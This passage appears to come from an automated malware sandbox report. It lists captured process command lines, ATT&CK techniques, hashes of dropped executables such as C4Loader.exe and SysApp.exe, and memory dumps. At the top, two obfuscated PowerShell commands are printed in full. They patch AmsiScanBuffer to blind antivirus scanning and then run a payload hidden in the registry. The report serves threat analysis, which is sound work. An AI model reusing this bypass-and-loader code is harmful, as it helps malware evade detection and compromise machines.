@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$CupIjKCniNp=$HWusCYLHSlgfw.GetMethod(''+'G'+''+'e'+''+'t'+'M'+[Char](111)+'d'+'u'+''+'l'+''+'e'+''+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+'er'+[Char](110)+''+[Char](101)+''+'l'+'32.'+[Char](100)+''+'l'+''+[Char](108)+'')));$jfGKkXPmbSTWBG=$qbrwPrXeJcCobu.Invoke($Null,@([Object]$CupIjKCniNp,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+'ibr'+'a'+''+'r'+''+[Char](121)+''+[Char](65)+'')));$jDejNbqNhZhWAsKNb=$qbrwPrXeJcCobu.Invoke($Null,@([Object]$CupIjKCniNp,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+''+'u'+''+'a'+''+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+'t')));$fUKsPUM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jfGKkXPmbSTWBG,$LxxiljLzDzxySVNYWsz).Invoke(''+'a'+''+'m'+''+'s'+'i.'+[Char](100)+''+'l'+''+'l'+'');$poZrIDJiaOzZJnGNW=$qbrwPrXeJcCobu.Invoke($Null,@([Object]$fUKsPUM,[Object]('A'+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+'B'+''+'u'+''+[Char](102)+'f'+'e'+'r')));$wonQPFKQzW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jDejNbqNhZhWAsKNb,$pxVxguugFiSnPwhokKBHnA).Invoke($poZrIDJiaOzZJnGNW,[uint32]8,4,[ref]$wonQPFKQzW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$poZrIDJiaOzZJnGNW,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jDejNbqNhZhWAsKNb,$pxVxguugFiSnPwhokKBHnA).Invoke($poZrIDJiaOzZJnGNW,[uint32]8,0x20,[ref]$wonQPFKQzW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'WA'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+'a'+'l'+[Char](101)+'r'+'s'+''+'t'+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
1⤵
PID:4268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zGADRKAfLldr{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$atsgjXElfxiTGc,[Parameter(Position=1)][Type]$rqfiNNtIOF)$zfzsDTAdWEs=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+'c'+''+[Char](116)+''+'e'+'dD'+[Char](101)+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+'Mo'+[Char](100)+'u'+'l'+'e',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+''+'T'+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+'Pu'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+','+[Char](65)+''+[Char](110)+''+[Char](115)+'iC'+[Char](108)+''+'a'+''+[Char](115)+'s,'+[Char](65)+''+'u'+''+'t'+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$zfzsDTAdWEs.DefineConstructor(''+'R'+''+[Char](84)+'S'+'p'+''+[Char](101)+''+[Char](99)+'i'+[Char](97)+'lN'+[Char](97)+''+'m'+'e,'+'H'+'i'+'d'+'e'+'B'+'y'+[Char](83)+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$atsgjXElfxiTGc).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+'a'+''+'n'+'ag'+'e'+''+[Char](100)+'');$zfzsDTAdWEs.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+'o'+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c,'+[Char](72)+''+'i'+''+[Char](100)+'e'+[Char](66)+''+'y'+''+'S'+''+'i'+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$rqfiNNtIOF,$atsgjXElfxiTGc).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $zfzsDTAdWEs.CreateType();}$mmzGAiAvIAHZc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+'o'+''+[Char](102)+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](109)+'mz'+[Char](71)+''+[Char](65)+''+'i'+''+[Char](65)+''+'v'+''+[Char](73)+''+[Char](65)+''+[Char](72)+''+[Char](90)+''+[Char](99)+'');$RklvFihsZZESdl=$mmzGAiAvIAHZc.GetMethod(''+[Char](82)+''+[Char](107)+'lvF'+'i'+'h'+[Char](115)+'Z'+[Char](90)+''+[Char](69)+''+[Char](83)+'d'+'l'+'',[Reflection.BindingFlags]''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ekjkTDAjyhbruMmQwaI=zGADRKAfLldr @([String])([IntPtr]);$bUWAJEdvtJncKNaNXvzsoE=zGADRKAfLldr @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zxxgAWRmfNT=$mmzGAiAvIAHZc.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+'a'+[Char](110)+'dl'+[Char](101)+'').Invoke($Null,@([Object]('kern'+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$GZzIinvEmjEkEK=$RklvFihsZZESdl.Invoke($Null,@([Object]$zxxgAWRmfNT,[Object](''+'L'+'o'+[Char](97)+''+'d'+''+[Char](76)+'i'+'b'+''+[Char](114)+''+'a'+''+[Char](114)+'y'+'A'+'')));$UKVjoxyPkMlufRbmO=$RklvFihsZZESdl.Invoke($Null,@([Object]$zxxgAWRmfNT,[Object](''+[Char](86)+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l'+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+''+[Char](99)+''+'t'+'')));$abiEUpg=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GZzIinvEmjEkEK,$ekjkTDAjyhbruMmQwaI).Invoke(''+'a'+''+'m'+'si.'+'d'+''+[Char](108)+''+[Char](108)+'');$bRkCQjFfCTeeIrtvc=$RklvFihsZZESdl.Invoke($Null,@([Object]$abiEUpg,[Object](''+'A'+''+'m'+''+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+'a'+[Char](110)+'B'+'u'+''+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$kaYoXpzQBo=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UKVjoxyPkMlufRbmO,$bUWAJEdvtJncKNaNXvzsoE).Invoke($bRkCQjFfCTeeIrtvc,[uint32]8,4,[ref]$kaYoXpzQBo);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bRkCQjFfCTeeIrtvc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UKVjoxyPkMlufRbmO,$bUWAJEdvtJncKNaNXvzsoE).Invoke($bRkCQjFfCTeeIrtvc,[uint32]8,0x20,[ref]$kaYoXpzQBo);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+'i'+''+'a'+'l'+[Char](101)+'r'+[Char](115)+''+'t'+'a'+'g'+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)
1⤵
PID:376

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e18dd55c-9e9c-420a-bfed-fcbc150bda44}
1⤵
PID:2720

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
9c6d0093edb0394e9b3dc7017e6f43f4

SHA1
0a39400e639afda01b6b3b01738427f10b4a102c

SHA256
d9426c0397a8fc42c04c42b1148d228d7a575d4f1053dafbfe4d091cb7378b07

SHA512
546d1a3760da0bef223acbe3d8fbaa68fd27b77858dc97ab84703e68af1dc24241ebdfe08d2c7f60c0db33e99ffd074da82ada66c72fde212d9f0615c69014ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
948B

MD5
a7ce8cefc3f798abe5abd683d0ef26dd

SHA1
b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

SHA256
5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

SHA512
c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
Filesize
1.4MB

MD5
bb86a343080f9f4696c250ef31a18d9d

SHA1
43b2193dcb1d56eac73ba88a7b461822074192d6

SHA256
095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

SHA512
24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
Filesize
1.4MB

MD5
bb86a343080f9f4696c250ef31a18d9d

SHA1
43b2193dcb1d56eac73ba88a7b461822074192d6

SHA256
095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

SHA512
24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
Filesize
1.4MB

MD5
bb86a343080f9f4696c250ef31a18d9d

SHA1
43b2193dcb1d56eac73ba88a7b461822074192d6

SHA256
095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

SHA512
24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

Download Submit
C:\Users\Admin\AppData\Local\Temp\RzLNTXYeUCWKsXbGyRAOmBTvKSJfjzaL
Filesize
2KB

MD5
77e31b1123e94ce5720ceb729a425798

SHA1
2b65c95f27d8dca23864a3ed4f78490039ae27bf

SHA256
68cafb091d3642a1ad2440bdb51834086945ded836ea25c8f75de7e5fc568d85

SHA512
9c660381b859040e20745a1cf42646af3bd3780e2795a5ff3cedc61db9877b608d1fc431a1bd3ba3f25dd3643898b1c0f2abfc067c6634e4ce65de2d4c0c724a

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
619c8d3ebd09bd86a6faa527354e08d5

SHA1
315b4f87c419a3ff24c62951c59e8089150846eb

SHA256
3827b2d39eb48088817b350a6a2ed9b1de9c1a4d5f33bfab0bec1ecff99aeb45

SHA512
5aa18e678d396e636a53f3b86542af058c819de58fe8bec6daa883f3ce382c21ad085f0dfc130b992e07a9dd0086ff62c8e2fe69c6b81f8f1506183367e7337a

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
619c8d3ebd09bd86a6faa527354e08d5

SHA1
315b4f87c419a3ff24c62951c59e8089150846eb

SHA256
3827b2d39eb48088817b350a6a2ed9b1de9c1a4d5f33bfab0bec1ecff99aeb45

SHA512
5aa18e678d396e636a53f3b86542af058c819de58fe8bec6daa883f3ce382c21ad085f0dfc130b992e07a9dd0086ff62c8e2fe69c6b81f8f1506183367e7337a

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
619c8d3ebd09bd86a6faa527354e08d5

SHA1
315b4f87c419a3ff24c62951c59e8089150846eb

SHA256
3827b2d39eb48088817b350a6a2ed9b1de9c1a4d5f33bfab0bec1ecff99aeb45

SHA512
5aa18e678d396e636a53f3b86542af058c819de58fe8bec6daa883f3ce382c21ad085f0dfc130b992e07a9dd0086ff62c8e2fe69c6b81f8f1506183367e7337a

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_45kw5kkz.geg.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nJObCsNVlgTeMaPEZQleQYhYzRyWJjPj
Filesize
71KB

MD5
386c014d0948d4fc41afa98cfca9022e

SHA1
786cc52d9b962f55f92202c7d50c3707eb62607b

SHA256
448b329f3a10bbe3e8f86cd91509c2783b63d28a375231eb23724f5e141420f2

SHA512
13d46209c6b052977d6242763b54ac5e35b389e765c82ba773b520ebf5eacabdfdc22b642cb9760e39ad59dd82fa40a31a8d41fd6dd7ea9c9ad08c57b7d8150f

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
3.0MB

MD5
50d48404f9b93a16c69aed2e6c585192

SHA1
3f949a4b96bac4f7e1cec881edb5b65295410a1c

SHA256
0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

SHA512
0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
3.0MB

MD5
50d48404f9b93a16c69aed2e6c585192

SHA1
3f949a4b96bac4f7e1cec881edb5b65295410a1c

SHA256
0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

SHA512
0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
3.0MB

MD5
50d48404f9b93a16c69aed2e6c585192

SHA1
3f949a4b96bac4f7e1cec881edb5b65295410a1c

SHA256
0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

SHA512
0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

Download Submit
memory/376-332-0x000001D69B6A0000-0x000001D69B6B0000-memory.dmp

Filesize
64KB

Download
memory/376-333-0x000001D69B6A0000-0x000001D69B6B0000-memory.dmp

Filesize
64KB

Download
memory/376-338-0x000001D69B6A0000-0x000001D69B6B0000-memory.dmp

Filesize
64KB

Download
memory/376-342-0x00007FFBF1370000-0x00007FFBF1565000-memory.dmp

Filesize
2.0MB

Download
memory/376-343-0x00007FFBEFA30000-0x00007FFBEFAEE000-memory.dmp

Filesize
760KB

Download
memory/392-373-0x00007FFBB13F0000-0x00007FFBB1400000-memory.dmp

Filesize
64KB

Download
memory/392-369-0x000002DCDA8B0000-0x000002DCDA8D7000-memory.dmp

Filesize
156KB

Download
memory/392-374-0x000002DCDA8B0000-0x000002DCDA8D7000-memory.dmp

Filesize
156KB

Download
memory/524-378-0x00007FFBB13F0000-0x00007FFBB1400000-memory.dmp

Filesize
64KB

Download
memory/524-377-0x000002A0FC3D0000-0x000002A0FC3F7000-memory.dmp

Filesize
156KB

Download
memory/524-431-0x000002A0FC3D0000-0x000002A0FC3F7000-memory.dmp

Filesize
156KB

Download
memory/624-359-0x00007FFBB13F0000-0x00007FFBB1400000-memory.dmp

Filesize
64KB

Download
memory/624-356-0x0000021DE9E30000-0x0000021DE9E51000-memory.dmp

Filesize
132KB

Download
memory/624-363-0x0000021DE9E60000-0x0000021DE9E87000-memory.dmp

Filesize
156KB

Download
memory/624-358-0x0000021DE9E60000-0x0000021DE9E87000-memory.dmp

Filesize
156KB

Download
memory/680-366-0x000001FF4BF10000-0x000001FF4BF37000-memory.dmp

Filesize
156KB

Download
memory/680-360-0x000001FF4BF10000-0x000001FF4BF37000-memory.dmp

Filesize
156KB

Download
memory/680-364-0x00007FFBB13F0000-0x00007FFBB1400000-memory.dmp

Filesize
64KB

Download
memory/704-384-0x00007FFBB13F0000-0x00007FFBB1400000-memory.dmp

Filesize
64KB

Download
memory/704-383-0x000001DBDFE60000-0x000001DBDFE87000-memory.dmp

Filesize
156KB

Download
memory/704-437-0x000001DBDFE60000-0x000001DBDFE87000-memory.dmp

Filesize
156KB

Download
memory/952-371-0x000001A5913D0000-0x000001A5913F7000-memory.dmp

Filesize
156KB

Download
memory/952-370-0x00007FFBB13F0000-0x00007FFBB1400000-memory.dmp

Filesize
64KB

Download
memory/952-368-0x000001A5913D0000-0x000001A5913F7000-memory.dmp

Filesize
156KB

Download
memory/1028-444-0x0000017175930000-0x0000017175957000-memory.dmp

Filesize
156KB

Download
memory/1028-388-0x00007FFBB13F0000-0x00007FFBB1400000-memory.dmp

Filesize
64KB

Download
memory/1028-386-0x0000017175930000-0x0000017175957000-memory.dmp

Filesize
156KB

Download
memory/1116-389-0x000001C388740000-0x000001C388767000-memory.dmp

Filesize
156KB

Download
memory/1116-450-0x000001C388740000-0x000001C388767000-memory.dmp

Filesize
156KB

Download
memory/1116-392-0x00007FFBB13F0000-0x00007FFBB1400000-memory.dmp

Filesize
64KB

Download
memory/1124-454-0x0000024E84B40000-0x0000024E84B67000-memory.dmp

Filesize
156KB

Download
memory/1124-394-0x00007FFBB13F0000-0x00007FFBB1400000-memory.dmp

Filesize
64KB

Download
memory/1124-391-0x0000024E84B40000-0x0000024E84B67000-memory.dmp

Filesize
156KB

Download
memory/1160-398-0x00007FFBB13F0000-0x00007FFBB1400000-memory.dmp

Filesize
64KB

Download
memory/1160-458-0x00000207300B0000-0x00000207300D7000-memory.dmp

Filesize
156KB

Download
memory/1160-397-0x00000207300B0000-0x00000207300D7000-memory.dmp

Filesize
156KB

Download
memory/1188-402-0x000001FCEE600000-0x000001FCEE627000-memory.dmp

Filesize
156KB

Download
memory/1188-461-0x000001FCEE600000-0x000001FCEE627000-memory.dmp

Filesize
156KB

Download
memory/2720-348-0x00007FFBEFA30000-0x00007FFBEFAEE000-memory.dmp

Filesize
760KB

Download
memory/2720-353-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/2720-346-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/2720-344-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/2720-347-0x00007FFBF1370000-0x00007FFBF1565000-memory.dmp

Filesize
2.0MB

Download
memory/3216-227-0x0000020DD6870000-0x0000020DD6892000-memory.dmp

Filesize
136KB

Download
memory/3216-234-0x0000020DD68D0000-0x0000020DD68E0000-memory.dmp

Filesize
64KB

Download
memory/3216-237-0x0000020DD68D0000-0x0000020DD68E0000-memory.dmp

Filesize
64KB

Download
memory/3216-240-0x0000020DD68E0000-0x0000020DD6AFC000-memory.dmp

Filesize
2.1MB

Download
memory/3216-235-0x0000020DD68D0000-0x0000020DD68E0000-memory.dmp

Filesize
64KB

Download
memory/3464-133-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/3464-139-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/4268-316-0x0000000003240000-0x0000000003250000-memory.dmp

Filesize
64KB

Download
memory/4268-341-0x0000000003240000-0x0000000003250000-memory.dmp

Filesize
64KB

Download
memory/4268-331-0x0000000003240000-0x0000000003250000-memory.dmp

Filesize
64KB

Download
memory/4392-159-0x0000000070880000-0x00000000708CC000-memory.dmp

Filesize
304KB

Download
memory/4392-140-0x0000000002760000-0x0000000002796000-memory.dmp

Filesize
216KB

Download
memory/4392-184-0x0000000004980000-0x0000000004990000-memory.dmp

Filesize
64KB

Download
memory/4392-183-0x0000000004980000-0x0000000004990000-memory.dmp

Filesize
64KB

Download
memory/4392-179-0x0000000008330000-0x00000000088D4000-memory.dmp

Filesize
5.6MB

Download
memory/4392-157-0x0000000004980000-0x0000000004990000-memory.dmp

Filesize
64KB

Download
memory/4392-156-0x0000000005D60000-0x0000000005D7E000-memory.dmp

Filesize
120KB

Download
memory/4392-146-0x00000000056D0000-0x0000000005736000-memory.dmp

Filesize
408KB

Download
memory/4392-169-0x0000000006310000-0x000000000632E000-memory.dmp

Filesize
120KB

Download
memory/4392-145-0x0000000005660000-0x00000000056C6000-memory.dmp

Filesize
408KB

Download
memory/4392-170-0x0000000007700000-0x0000000007D7A000-memory.dmp

Filesize
6.5MB

Download
memory/4392-171-0x0000000007080000-0x000000000709A000-memory.dmp

Filesize
104KB

Download
memory/4392-144-0x0000000004EB0000-0x0000000004ED2000-memory.dmp

Filesize
136KB

Download
memory/4392-143-0x0000000004FC0000-0x00000000055E8000-memory.dmp

Filesize
6.2MB

Download
memory/4392-142-0x0000000004980000-0x0000000004990000-memory.dmp

Filesize
64KB

Download
memory/4392-141-0x0000000004980000-0x0000000004990000-memory.dmp

Filesize
64KB

Download
memory/4392-178-0x0000000007410000-0x0000000007432000-memory.dmp

Filesize
136KB

Download
memory/4392-172-0x00000000070F0000-0x00000000070FA000-memory.dmp

Filesize
40KB

Download
memory/4392-177-0x00000000072F0000-0x00000000072F8000-memory.dmp

Filesize
32KB

Download
memory/4392-158-0x0000000006330000-0x0000000006362000-memory.dmp

Filesize
200KB

Download
memory/4392-173-0x000000007FB60000-0x000000007FB70000-memory.dmp

Filesize
64KB

Download
memory/4392-174-0x0000000007340000-0x00000000073D6000-memory.dmp

Filesize
600KB

Download
memory/4392-176-0x0000000007300000-0x000000000731A000-memory.dmp

Filesize
104KB

Download
memory/4392-175-0x00000000072B0000-0x00000000072BE000-memory.dmp

Filesize
56KB

Download
memory/4492-312-0x00007FF7B8E60000-0x00007FF7B8E89000-memory.dmp

Filesize
164KB

Download
memory/4600-256-0x0000025F537C0000-0x0000025F537D0000-memory.dmp

Filesize
64KB

Download
memory/4600-254-0x0000025F537C0000-0x0000025F537D0000-memory.dmp

Filesize
64KB

Download
memory/4600-253-0x0000025F537C0000-0x0000025F537D0000-memory.dmp

Filesize
64KB

Download
memory/4600-259-0x0000025F6D3F0000-0x0000025F6D60C000-memory.dmp

Filesize
2.1MB

Download
memory/4600-255-0x0000025F537C0000-0x0000025F537D0000-memory.dmp

Filesize
64KB

Download
memory/4672-269-0x00007FF73AB00000-0x00007FF73AEC0000-memory.dmp

Filesize
3.8MB

Download
memory/5096-236-0x0000000005890000-0x00000000058A0000-memory.dmp

Filesize
64KB

Download
memory/5096-221-0x0000000005890000-0x00000000058A0000-memory.dmp

Filesize
64KB

Download
memory/5096-218-0x0000000006400000-0x000000000640A000-memory.dmp

Filesize
40KB

Download
memory/5096-339-0x0000000005890000-0x00000000058A0000-memory.dmp

Filesize
64KB

Download
memory/5096-340-0x0000000005890000-0x00000000058A0000-memory.dmp

Filesize
64KB

Download
memory/5096-200-0x0000000000CB0000-0x0000000000E1C000-memory.dmp

Filesize
1.4MB

Download
memory/5096-208-0x00000000056B0000-0x0000000005742000-memory.dmp

Filesize
584KB

Download